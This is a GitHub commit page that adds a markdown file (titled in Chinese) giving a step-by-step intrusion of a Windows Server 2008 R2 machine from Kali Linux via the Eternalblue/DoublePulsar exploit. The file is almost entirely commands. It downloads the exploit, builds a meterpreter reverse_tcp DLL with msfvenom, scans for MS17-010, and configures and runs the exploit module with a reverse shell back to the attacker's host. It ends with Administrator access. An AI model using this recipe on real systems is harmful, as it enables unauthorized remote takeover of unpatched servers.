Skip to content

Commit a233256

Browse files
zhanghe06zhanghe06
committed
基于kali利用Eternalblue的win服务器入侵过程
1 parent 4ad695a commit a233256

1 file changed

Lines changed: 50 additions & 0 deletions

File tree

Eternalblue.md

Lines changed: 50 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,50 @@
1+
基于kali利用Eternalblue的win服务器入侵过程
2+
目标:cn_windows_server_2008_r2_standard_enterprise_datacenter_web_x64
3+
4+
```
5+
# sudo dpkg --add-architecture i386
6+
# apt-get update
7+
# apt-get install winetricks
8+
# wine --version
9+
# apt-get install wine32
10+
11+
# wget -c -O Eternalblue-Doublepulsar-Metasploit.zip https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/archive/master.zip
12+
# unzip Eternalblue-Doublepulsar-Metasploit.zip
13+
14+
# service postgresql start
15+
16+
# ifconfig
17+
# mkdir -p /root/.wine/drive_c/
18+
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -f dll > /root/.wine/drive_c/eternal11.dll
19+
20+
# netdiscover
21+
22+
# msfconsole
23+
msf > use auxiliary/scanner/smb/smb_ms17_010
24+
msf auxiliary(smb_ms17_010) > options
25+
msf auxiliary(smb_ms17_010) > set RHOSTS 192.168.1.107
26+
msf auxiliary(smb_ms17_010) > run
27+
28+
# cd Eternalblue-Doublepulsar-Metasploit-master/
29+
# cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
30+
# cd deps
31+
# pwd
32+
33+
> back
34+
> reload_all
35+
msf exploit(eternalblue_doublepulsar) > use exploit/windows/smb/eternalblue_doublepulsar
36+
msf exploit(eternalblue_doublepulsar) > options
37+
msf exploit(eternalblue_doublepulsar) > set DOUBLEPULSARPATH /root/Eternalblue-Doublepulsar-Metasploit-master/deps
38+
msf exploit(eternalblue_doublepulsar) > set ETERNALBLUEPATH /root/Eternalblue-Doublepulsar-Metasploit-master/deps
39+
msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT explorer.exe
40+
msf exploit(eternalblue_doublepulsar) > set RHOST 192.168.1.107
41+
msf exploit(eternalblue_doublepulsar) > set TARGETARCHITECTURE x64
42+
msf exploit(eternalblue_doublepulsar) > show targets
43+
msf exploit(eternalblue_doublepulsar) > set target 7
44+
msf exploit(eternalblue_doublepulsar) > set PAYLOAD windows/x64/meterpreter/reverse_tcp # 32bit: set PAYLOAD windows/meterpreter/reverse_tcp
45+
msf exploit(eternalblue_doublepulsar) > set LHOST 192.168.1.104
46+
msf exploit(eternalblue_doublepulsar) > exploit
47+
48+
meterpreter > getuid
49+
Server username: WIN-2E66MFMUV4B\Administrator
50+
```

0 commit comments

Comments
 (0)